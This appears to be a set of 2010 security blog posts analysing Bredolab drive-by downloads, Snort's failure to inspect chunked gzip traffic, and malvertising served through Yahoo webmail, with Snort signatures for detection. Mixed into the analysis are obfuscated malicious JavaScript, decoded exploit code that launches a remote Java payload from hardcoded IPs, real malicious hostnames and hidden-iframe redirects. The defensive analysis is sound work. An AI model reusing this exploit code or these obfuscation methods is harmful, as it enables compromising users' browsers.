Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q102Q109Q29Q58Q29Q102Q109Q112Q88Q74Q94Q113Q101Q43Q111Q108Q114Q107Q97Q37Q74Q94Q113Q101Q43Q111Q94Q107Q97Q108Q106Q37Q38Q29Q39Q29Q37Q102Q109Q112Q43Q105Q98Q107Q100Q113Q101Q42Q46Q38Q29Q38Q90Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q7Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q114Q29Q58Q29Q31Q101Q113Q113Q109Q55Q29Q42Q71Q42Q103Q94Q111Q29Q42Q71Q89Q89Q89Q89Q31Q40Q102Q109Q40Q31Q89Q89Q109Q114Q95Q105Q102Q96Q89Q89Q45Q45Q46Q43Q103Q94Q111Q29Q107Q108Q107Q98Q31Q56Q7Q7Q29Q29Q29Q29Q29Q29Q29Q29Q102Q99Q29Q37Q116Q102Q107Q97Q108Q116Q43Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q94Q109Q109Q75Q94Q106Q98Q29Q58Q58Q29Q31Q74Q102Q96Q111Q108Q112Q108Q99Q113Q29Q70Q107Q113Q98Q111Q107Q98Q113Q29Q66Q117Q109Q105Q108Q111Q98Q111Q31Q38Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q108Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q76Q63Q71Q66Q64Q81Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q96Q105Q94Q112Q112Q102Q97Q29Q58Q29Q31Q96Q105Q112Q102Q97Q55Q64Q62Q67Q66Q66Q67Q62Q64Q42Q65Q66Q64Q52Q42Q45Q45Q45Q45Q42Q45Q45Q45Q45Q42Q62Q63Q64Q65Q66Q67Q67Q66Q65Q64Q63Q62Q31Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q105Q94Q114Q107Q96Q101Q37Q114Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q122Q29Q98Q105Q112Q98Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q108Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q76Q63Q71Q66Q64Q81Q31Q38Q56Q7Q29Q29Q
29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q107Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q76Q63Q71Q66Q64Q81Q31Q38Q56Q7Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q113Q118Q109Q98Q29Q58Q29Q31Q94Q109Q109Q105Q102Q96Q94Q113Q102Q108Q107Q44Q107Q109Q111Q114Q107Q113Q102Q106Q98Q42Q112Q96Q111Q102Q109Q113Q94Q95Q105Q98Q42Q109Q105Q114Q100Q102Q107Q56Q97Q98Q109Q105Q108Q118Q106Q98Q107Q113Q113Q108Q108Q105Q104Q102Q113Q31Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q107Q43Q113Q118Q109Q98Q29Q58Q29Q31Q94Q109Q109Q105Q102Q96Q94Q113Q102Q108Q107Q44Q103Q94Q115Q94Q42Q97Q98Q109Q105Q108Q118Q106Q98Q107Q113Q42Q113Q108Q108Q105Q104Q102Q113Q31Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q108Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q107Q38Q56Q7Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q113Q111Q118Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q105Q94Q114Q107Q96Q101Q37Q114Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q122Q29Q96Q94Q113Q96Q101Q29Q37Q98Q38Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q107Q43Q105Q94Q114Q107Q96Q101Q37Q114Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q122Q96Q94Q113Q96Q101Q37Q98Q38Q120Q122Q7Q29Q29Q29Q7Q29Q29Q29Q29





0

This then causes the client to make a request for the content of http://punkdye.ru:8080/jquery.jxx?v=5.3.4. This URI is able to be sig’d on with IDS’s such as Snort to let you know a client has been hitting one of these drive by’s:

GET /jquery.jxx?v=5.3.4 HTTP/1.1
Accept: */*
Referer: http://punkdye.ru:8080/index.php?pid=1&Cxuuxx0tgpkezo09=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: punkdye.ru:8080
Connection: Keep-Alive
Cookie: pid=1

The response to this request contains very little information, however it is key to making the deobfuscation of the data within the div tags be executed properly by the browser:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Aug 2010 
Content-Type: text/javascript
Connection: close
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 22

eval("Mo9g0b0='Q';");

After the browser has this piece of information, it is able to deobfuscate and execute the following JavaScript which is a result of the data hidden in the div’s along with the deobfuscation logic in the JavaScript:

if((document.all)&&(navigator.appVersion.indexOf('MSIE 7.')!=-1)) document.write("");
D6biz750 = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
for(i in D6biz750){
try{
Qcdgcii = new ActiveXObject(D6biz750[i]);
if (Qcdgcii){
Xn51q1 = document.createElement("iframe");
Xn51q1.setAttribute("src", "Notes1.pdf");
document.body.appendChild(Xn51q1);
}
}catch(e){}
}
try{
if (navigator.javaEnabled()){
Efe81htb = docum?nt.createElement("iframe");
Efe81htb.setAttribute("src", "Applet1.html");
document.body.appendChild(Efe81htb);
}
}catch(e){}
try{
if (navigator.javaEnabled()){

var ips = ["174.143.145.234", "184.82.38.68", "198.145.116.71", "207.191.229.166", "207.58.189.133", "212.175.45.245", "68.233.4.27"];
var ip = ips[Math.round(Math.random() * (ips.length-1) )];
var u = "http: -J-jar -J\\\\"+ip+"\\public\\001.jar none";

if (window.navigator.appName == "Microsoft Internet Explorer") {
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
o.launch(u);
} else {
var o = document.createElement("OBJECT");
var n = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
n.type = "application/java-deployment-toolkit";
document.body.appendChild(o);
document.body.appendChild(n);
try {
o.launch(u);
} catch (e) {
n.launch(u);
}
}
}
}catch(e){}

After this JavaScript executes properly in the browser, it then causes the client to download a PDF in the sample we have captured. Once the PDF has been downloaded and the client is vulnerable to it, the client will pull down the executable malware payload. With bredolab sucessfully installed, the client will then call home into the controller. Luckily the great people over at SourceFire’s VRT have had signatures that trigger on these infections and help you clean them up quite easily for a while. The are as follows:

SPECIFIC-THREATS Bredolab downloader communication with server attempt
BACKDOOR rogue software xp police antivirus install-timedetection

The signatures that we have written to detect the drive by’s and redirects to them are as follows. These have been published to the Emerging Threats mailing list a while back, however these are what we run for our client to help us find this stuff. The false positive rates are very low except for the first signature as some people download lists of malicious sites from web servers and that causes that sig to fire. You can easily identify those and get rid of the FP’s with the threshold.conf file in Snort however:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"DRIVEBY bredolab - server response contains .ru:8080/index.php?"; flow:established,to_client; content:".ru:8080/index.php?"; classtype:bad-unknown; sid:5600083; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"DRIVEBY bredolab - cookie: pid=1"; flow:established,to_server; content:"pid=1|0D|"; http_cookie; classtype:bad-unknown; sid:5600084; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"DRIVEBY bredolab - jquery.jxx"; flow:established,to_server; content:"/jquery.jxx?v="; http_uri; classtype:bad-unknown; sid:5600085; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"DRIVEBY bredolab - request to a *.ru:8080 URI"; flow:established,to_server; content:".ru:8080|0D 0A|"; http_header; classtype:bad-unknown; sid:5600086; rev:1;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"DRIVEBY bredolab - hidden div served by nginx"; flow:established,to_client; content:"Server: nginx"; http_header; content:"<"; depth:120; classtype:bad-unknown; sid:5600089; rev:1;)

Who Needs SSL? Evading IDS With Apache mod_gzip and Chunked Encoding

Eoin Miller — Thu, 12 Aug 2010 21:44:11 +0000

After getting a bit frustrated a little while ago while attempting to write a signature for some hidden iframe’s that were redirecting clients to drive by sites, I started digging around a bit more and even posted over on the Snort-Users mailing list and found out something a little terrifying from the guys over at SourceFire. Snort (or Suricata for that matter) will not actually gunzip HTTP that is gzip’d if it has been transferred with chunked encoding. Now, you may be thinking to yourself “that’s not true, I totally have my http_inspect configured the way it comes with the VRT rulset downloads and it has gzip and chunked encoding configuration options enabled!”. Well, unfortunately the current logic of the program will dechunk the data and then run the signatures against the dechunked (but still gzip’d) data and then it discards the gzip’d data and moves onto the next packet. One would hope that the logic would be updated to detected if HTTP body is chunked+gzip’d, then dechunk->gunzip->compare against signatures. This will obviously actually allow people to reliably inspect the body of an HTTP response intead of attempting to rely upon only being able to write sigs on the compressed content of the body, however there may be some instances where this is beneficial. The trouble is this is a large amount of traffic and do you want to (or have) the processor cycles to compare the gzip’d data and then the gunzip’d data. Below we will go through the process step by step to demonstrate this issue. Here we have our response packet which you can see is chunked and compressed with gzip (as is indicated in the HTTP headers):

00000000  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
00000010  0a 53 65 72 76 65 72 3a  20 6e 67 69 6e 78 2f 30 .Server:  nginx/0
00000020  2e 36 2e 33 39 0d 0a 44  61 74 65 3a 20 4d 6f 6e .6.39..D ate: Mon
00000030  2c 20 31 32 20 4a 75 6c  20 32 30 31 30 20 31 38 , 12 Jul  2010 18
00000040  3a 30 37 3a 31 30 20 47  4d 54 0d 0a 43 6f 6e 74 :07:10 G MT..Cont
00000050  65 6e 74 2d 54 79 70 65  3a 20 74 65 78 74 2f 68 ent-Type : text/h
00000060  74 6d 6c 0d 0a 54 72 61  6e 73 66 65 72 2d 45 6e tml..Tra nsfer-En
00000070  63 6f 64 69 6e 67 3a 20  63 68 75 6e 6b 65 64 0d coding:  chunked.
00000080  0a 43 6f 6e 6e 65 63 74  69 6f 6e 3a 20 6b 65 65 .Connect ion: kee
00000090  70 2d 61 6c 69 76 65 0d  0a 58 2d 50 6f 77 65 72 p-alive. .X-Power
000000A0  65 64 2d 42 79 3a 20 50  48 50 2f 35 2e 31 2e 36 ed-By: P HP/5.1.6
000000B0  0d 0a 43 6f 6e 74 65 6e  74 2d 45 6e 63 6f 64 69 ..Conten t-Encodi
000000C0  6e 67 3a 20 67 7a 69 70  0d 0a 0d 0a 61 0d 0a 1f ng: gzip ....a...
000000D0  8b 08 00 00 00 00 00 00  03 0d 0a 31 33 30 0d 0a ........ ...130..
000000E0  bd 52 cb 4e c4 30 0c bc  ef 57 44 b9 04 24 da 74 .R.N.0.. .WD..$.t
000000F0  d9 07 85 4d 7a 44 82 03  1c e0 07 d2 d6 6d 22 d2 ...MzD.. .....m".
00000100  64 37 75 f7 f1 f7 a4 dd  15 42 20 ae f8 64 8f 3d d7u..... .B ..d.=
00000110  1e 6b 64 a1 b1 b3 85 d0  a0 ea 62 26 3a 40 45 34 .kd..... ..b&:@E4
00000120  e2 36 81 dd 60 f6 92 56  de 21 38 4c f0 b4 05 4a .6..`..V .!8L...J
00000130  2e 95 a4 08 47 e4 23 73  43 2a ad 42 0f 28 9f de ....G.#s C*.B.(..
00000140  5e 93 3c 5f dd 27 73 1a  17 a1 41 0b c5 32 5b 92 ^.<_.'s. ..A..2[.
00000150  17 8f e4 d1 0f ae 16 fc  0c 0a 3e 89 89 d2 d7 27 ........ ..>....'
00000160  52 b6 95 b7 3e 48 7a d0  06 61 64 56 51 0e 42 bc R...>Hz. .adVQ.B.
00000170  68 fe 93 1e 11 c1 2f ed  99 d0 71 e6 52 b8 d6 b8 h...../. ..q.R...
00000180  23 cf d2 75 ba 58 7d 9b  e0 a3 42 31 fb ff f8 65 #..u.X}. ..B1...e
00000190  23 0b d0 04 e8 35 fb 72  90 dd 6d 86 60 e5 68 f5 #....5.r ..m.`.h.
000001A0  03 e7 25 58 6b 2a df c3  47 9e 1a d7 78 be cb 7b ..%Xk*.. G...x..{
000001B0  ce 0a d1 57 c1 6c 91 58  e5 da 41 b5 20 e9 b3 da ...W.l.X ..A. ...
000001C0  ab b7 09 a4 05 e9 c1 36  69 e7 f7 f0 ee af 16 d9 .......6 i.......
000001D0  72 7d b3 c8 56 eb eb 0d  11 fc cc 8b 66 9a 26 a8 r}..V... ....f.&.
000001E0  0e 48 1f 2a c9 fe d2 72  b7 96 33 72 30 35 6a c9 .H.*...r ..3r05j.
000001F0  e6 8c 68 30 ad c6 29 9d  d8 a5 0f 35 04 c9 b2 78 ..h0..). ...5...x
00000200  10 3f 2f 8c c9 f4 36 9f  04 6b bf 18 3d 02 00 00 .?/...6. .k..=...
00000210  0d 0a 30 0d 0a 0d 0a                             ..0....

Here we have extract the chunked body of this response (which is still compressed with gzip) and if we look at it at this point, we notice there really isn’t anything in here our sigs are going to fire on. However since the http_inspect preprocessor has dechunked the data to this buffer, it will compare the signatures at this point without gunzip’ing it. Once comparison is complete it is on to the next packet:

0000   1f 8b 08 00 00 00 00 00 00 03 bd 52 cb 4e c4 30  ...........R.N.0
0010   0c bc ef 57 44 b9 04 24 da 74 d9 07 85 4d 7a 44  ...WD..$.t...MzD
0020   82 03 1c e0 07 d2 d6 6d 22 d2 64 37 75 f7 f1 f7  .......m".d7u...
0030   a4 dd 15 42 20 ae f8 64 8f 3d 1e 6b 64 a1 b1 b3  ...B ..d.=.kd...
0040   85 d0 a0 ea 62 26 3a 40 45 34 e2 36 81 dd 60 f6  ....b&:@E4.6..`.
0050   92 56 de 21 38 4c f0 b4 05 4a 2e 95 a4 08 47 e4  .V.!8L...J....G.
0060   23 73 43 2a ad 42 0f 28 9f de 5e 93 3c 5f dd 27  #sC*.B.(..^.<_.'
0070   73 1a 17 a1 41 0b c5 32 5b 92 17 8f e4 d1 0f ae  s...A..2[.......
0080   16 fc 0c 0a 3e 89 89 d2 d7 27 52 b6 95 b7 3e 48  ....>....'R...>H
0090   7a d0 06 61 64 56 51 0e 42 bc 68 fe 93 1e 11 c1  z..adVQ.B.h.....
00a0   2f ed 99 d0 71 e6 52 b8 d6 b8 23 cf d2 75 ba 58  /...q.R...#..u.X
00b0   7d 9b e0 a3 42 31 fb ff f8 65 23 0b d0 04 e8 35  }...B1...e#....5
00c0   fb 72 90 dd 6d 86 60 e5 68 f5 03 e7 25 58 6b 2a  .r..m.`.h...%Xk*
00d0   df c3 47 9e 1a d7 78 be cb 7b ce 0a d1 57 c1 6c  ..G...x..{...W.l
00e0   91 58 e5 da 41 b5 20 e9 b3 da ab b7 09 a4 05 e9  .X..A. .........
00f0   c1 36 69 e7 f7 f0 ee af 16 d9 72 7d b3 c8 56 eb  .6i.......r}..V.
0100   eb 0d 11 fc cc 8b 66 9a 26 a8 0e 48 1f 2a c9 fe  ......f.&..H.*..
0110   d2 72 b7 96 33 72 30 35 6a c9 e6 8c 68 30 ad c6  .r..3r05j...h0..
0120   29 9d d8 a5 0f 35 04 c9 b2 78 10 3f 2f 8c c9 f4  )....5...x.?/...
0130   36 9f 04 6b bf 18 3d 02 00 00                    6..k..=...

However we can gunzip this extracted data, we get the following which has some stuff we are very interested in attempting to signature on, mainly a hidden iframe redirecting a client to a drive by site:

0000   3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65  ..404
0060   20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c   Not Found</titl
0070   65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62  e></head><body b
0080   67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a  gcolor="white">.
0090   3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20  <center><h1>404
00a0   4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f  Not Found</h1></
00b0   63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e  center>.<hr><cen
00c0   74 65 72 3e 6e 67 69 6e 78 2f 30 2e 36 2e 33 35  ter>nginx/0.6.35
00d0   3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79  </center>.</body
00e0   3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a  >...............
00f0   0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a  ................
0100   0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a  ................
0110   0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a  ................
0120   0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a  ................
0130   0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a  ................
0140   0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a  ................
0150   0a 0a 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65  ....<meta http-e
0160   71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63  quiv='refresh' c
0170   6f 6e 74 65 6e 74 3d 27 37 3b 75 72 6c 3d 68 74  ontent='7;url=ht
0180   74 70 3a 2f 2f 62 65 6c 6c 69 63 6f 73 65 6b 38  tp://bellicosek8
0190   2e 69 6e 66 6f 2f 71 38 73 2f 27 3e 3c 73 63 72  .info/q8s/'><scr
01a0   69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61  ipt language="Ja
01b0   76 61 53 63 72 69 70 74 22 3e 20 73 65 6c 66 2e  vaScript"> self.
01c0   6d 6f 76 65 54 6f 28 33 30 34 36 2c 33 30 35 36  moveTo(3046,3056
01d0   29 3b 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 69 66  ); </script>.<if
01e0   72 61 6d 65 20 73 72 63 3d 27 68 74 74 70 3a 2f  rame src='http:/
01f0   2f 62 65 6c 6c 69 63 6f 73 65 6b 38 2e 69 6e 66  /bellicosek8.inf
0200   6f 2f 6e 32 6c 2f 27 20 77 69 64 74 68 3d 27 31  o/n2l/' width='1
0210   27 20 68 65 69 67 68 74 3d 27 31 27 20 66 72 61  ' height='1' fra
0220   6d 65 62 6f 72 64 65 72 3d 27 30 27 3e 3c 2f 69  meborder='0'></i
0230   66 72 61 6d 65 3e 3c 2f 68 74 6d 6c 3e           frame></html></pre>
<p>Or the following in just plain old printable HTML output:</p>
<pre style="PADDING-LEFT: 30px"><html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<title>404 Not Found
404 Not Found
nginx/0.6.35


<iframe src='http://bellicosek8.info/n2l/' width='1' height='1' frameborder='0'>iframe>

So in testing, we wrote the most simple of signatures looking for just the string “iframe” with our sample PCAP we had. The signature was as follows:

alert tcp any any ->  any any (msg:"MALVERTISING hidden iframe served by nginx 2"; content:"iframe"; nocase; classtype:bad-unknown; sid:5600066; rev:1;)

So when we look at the output to the console, we see that we get zero alerts which should not be the case. Below we take a look at the output from Snort regarding http_inspect while we were running against this PCAP we were using for testing purposes. Here we notice something odd, there is a number for “HTTP Response Gzip packets extracted” and also “Gzip Compressed Data Processed” but the value for “Gzip Decompressed Data Processed” is “0.00″.

HTTP Inspect - encodings (Note: stream-reassembled packets included):
     POST methods:                         0
     GET methods:                          2
     HTTP Request Headers extracted:       2
     HTTP Request Cookies extracted:       0
     Post parameters extracted:            0
     HTTP response Headers extracted:      2
     HTTP Response Cookies extracted:      0
     Unicode:                              0
     Double unicode:                       0
     Non-ASCII representable:              0
     Base 36:                              0
     Directory traversals:                 0
     Extra slashes ("//"):                 0
     Self-referencing paths ("./"):        0
     HTTP Response Gzip packets extracted: 2
     Gzip Compressed Data Processed:       331.00
     Gzip Decompressed Data Processed:     0.00 
     Total packets processed:              4

So it appears that Snort’s http_inspect does indeed identfy and extract the gzip’d packets, however it does not unzip the packet and inspect it if it was transferred via chunked encoding. Below is the section of the snort.conf file regarding http_inspect that was used during testing. This should be the same configuration as you receive from the snort.conf file contained within the VRT ruleset you download from Snort.org. Note that we definately have this configured to decompress, dechunk and inspect gzip’d data (all highlighted in red) and the numbers for each of these variables in the configurations are much much larger than anything we are dealing with in the example PCAP.

preprocessor http_inspect: global iis_unicode_map unicode.map 1252 compress_depth 20480 decompress_depth 20480
preprocessor http_inspect_server: server default \
     chunk_length 500000 \
     server_flow_depth 0 \
     client_flow_depth 0 \
     post_depth 65495 \
         oversize_dir_length 500 \
     max_header_length 750 \
     max_headers 100 \
     ports { 80 1220 2301 3128 7777 7779 8000 8008 8028 8080 8180 8888 9999 }\
     non_rfc_char { 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 } \
     enable_cookie \
     extended_response_inspection \
     inspect_gzip \
     apache_whitespace no \
     ascii no \
     bare_byte no \
         directory no \
         double_decode no \
         iis_backslash no \
         iis_delimiter no \
         iis_unicode no \
         multi_slash no \
         non_strict \
         u_encode yes \
         webroot no

Unfortunately, quite a bit of gzip’d content is transmitted over chunked encoding. This is due to the fact that chunked encoding is used when the content length of the data being sent to the client from the server is unknown. Generally when you are compressing data on the fly to deliver to a client the webserver will end up using this method since it can’t compute how large the response is going to be until after it has already started sending data back to the client. Hopefully functionality will be added to remedy the inability to inspect these types of HTTP responses, because this is currently being leveraged to evade IDS quite frequently by many different types of FakeAV, drive by and malvertising sites in the wild.

Anatomy of Malicious Advertising Redirecting Clients to Drive-By Attack Sites

Eoin Miller — Fri, 06 Aug 2010 21:41:28 +0000

Below we have a user whom has done something millions upon millions of people do every day, login to their Yahoo! webmail. However, this time around Yahoo! is going to let someone they have a business relationship with attempt to exploit them and deliver malicious software into their computer. Upon visiting the site, Yahoo! will cause the client to make the following request to a malvertising server (c3metrics.net). Please note that the referer in the below request is a web service that routes the client to the advertisement to display to the clients logging in to the Yahoo! webmail service, if you directly visit it and read the JavaScript comments you can validate this:

GET /jsc/fm.js?n=162&c=24/1&d=14&s=23&w=1&h=1&nc=1275511688&l=&z= HTTP/1.1
Accept: */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; )
Host: c3metrics.net
Connection: Keep-Alive

The response to this request will be an HTTP 301 status code that will cause a redirect from the above URI to the below, they are nearly identical except for a single backslash between the fm.js and the ?n:

HTTP/1.1 301 Moved Permanently
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 
Content-Type: text/html
Content-Length: 185
Location: http://c3metrics.net/jsc/fm.js/?n=162&c=24/1&d=14&s=23&w=1&h=1&nc=1275511688&l=&z=
Connection: keep-alive


301 Moved Permanently

301 Moved Permanently
nginx/0.8.45

Now the user is following the redirected URI it received:

Request:
GET /jsc/fm.js/?n=162&c=24/1&d=14&s=23&w=1&h=1&nc=1275511688&l=&z= HTTP/1.1
Accept: */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; )
Host: c3metrics.net
Connection: Keep-Alive

However, this time around the malvertising server is going to serve the client some JavaScript that is obfuscated in order to escape detection or analysis by various types of network based network security tools (IDS,IPS, etc):

HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 3572

var _MlgYp=new String('evafeds'.substr(0,3)+'bruller'.substr(3,1));var RUOR=this;var JXzn_=RUOR [_MlgYp];var CVXMF_s=new String('unescape');var uhbnP=RUOR [CVXMF_s];var IBpC='PrMPdkPd=PJOPd=PJ/PJkPd=PJgPJsParPkgParPa2PJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2Pa/PaqPJdPJiPd=P=JPdiPJsPJsPi/PJiPJOPdaPa2Pa/PasParPkrPasParPkOPasParPkrPasParPkrPasParPkrPasParPkrPa/ParPagParPJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2Pa/PaqPJdPJiPd=P=JPdiPJsPJsPi/PJiPJOPdaPa2Pa/PasParPkrPasParPkOPasParPkrPasParPkrPasParPkrPasParPkrPa/PaqPd=PJ3P=dP=gPi=PikPd=PdaPJ/PJqPJdPa2Pa/PaqPdkPdiPJaPdkPd=PdaPJ/PJqPJdPa2PkrPasParPJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2Pa/PaqPJdPJiPd=P=JPdiPJsPJsPi/PJiPJOPdaPa2Pa/PasParPkrPasParPkOPasParPkrPasParPkrPasParPkrPasParPkrPa/PaqPd=PJ3P=dP=gPi=PikPd=PdaPJ/PJqPJdPa2Pa/PaqPJsPJOPdkPd=P=/PJqPJ=PJiPd2P=3PJJPa2PaaParPaaPa/PagPkOPa/Pa/Pa/ParPa3ParPa2PkOPkrPkrPkrParPaMParPkJPkrParPaMParPkJPkrPa/PkmPrMPrMPdJPJOPdaParPJOPJsPJsPi3Pd=ParPkgParPaaPkOPasPkaPasPkkPasPk=PasPkiPasPkJPasPkdPasPk2PasPk/PaaPkmPrMPdJPJOPdaParPJgPd=PJkPJ2ParPkgParPJOPJsPJsPi3Pd=PaqPJgPJOPd=PJkPJ2Pa2PdkPd=PJOPd=PJ/PJkPd=PJgPJsPa/PkmPrMPrMPrMPrMPJ/PJJParPa2ParPJgPd=PJkPJ2ParPaOPkgParPJqPdiPJsPJsParPa/ParPdmPrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJ/PJJPdaPJOPJgPJiParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PJkPkkPJgPJiPd=PdaPJ/PJkPdkPaqPJqPJiPd=Pa3PdkPd=PJOPd=PdkPi3Pd=PaqPdrPJ2PdrPk3PJ/PJ=PkgPkOPkaPkdPkiPkiPkOPkOPkJPk2Pk2PaJPdkPkgPkrPaJPJiPkgPkOPadParPdkPd=Pd/PJsPJiPkgPadPdJPJ/PdkPJ/PJaPJ/PJsPJ/Pd=Pd/PkMPJ2PJ/PJ=PJ=PJiPJqPkmPadParPddPJ/PJ=Pd=PJ2PkgPadPkrPadParPJ2PJiPJ/PJdPJ2Pd=PkgPadPkrPadParParPaiPkkP=iPaiPkkP=kPa3PJ/PJJPdaPJOPJgPJiPaiPkkP=iPaaPa/Pa/PkmPrMPdgParParPJiPJsPdkPJiParParPdmPrMPrMPr/Pr/PrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJ/PJJPdaPJOPJgPJiParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PddPJ/PJsPdkPd=PJ3PdkPJiPaqPJkPJ3PaqPJkPJkPa3PdMPJgPd=PdaPJkPaqPdrPJ2PdrPk3PdrPdOPkgPJkPdiPdkPd=PkOPadParPdkPd=Pd/PJsPJiPkgPadPdJPJ/PdkPJ/PJaPJ/PJsPJ/Pd=Pd/PkMPJ2PJ/PJ=PJ=PJiPJqPkmPadParPddPJ/PJ=Pd=PJ2PkgPadPkOPadParPJ2PJiPJ/PJdPJ2Pd=PkgPadPkOPadParPaiPkkP=iPaiPkkP=kPa3PJ/PJJPdaPJOPJgPJiPaiPkkP=iPaaPa/Pa/PkmParPrMPrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJ/PJJPdaPJOPJgPJiParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PJkPkkPJgPJiPd=PdaPJ/PJkPdkPaqPJqPJiPd=Pa3PdkPd=PJOPd=PdkPi3PJMPdkPi3P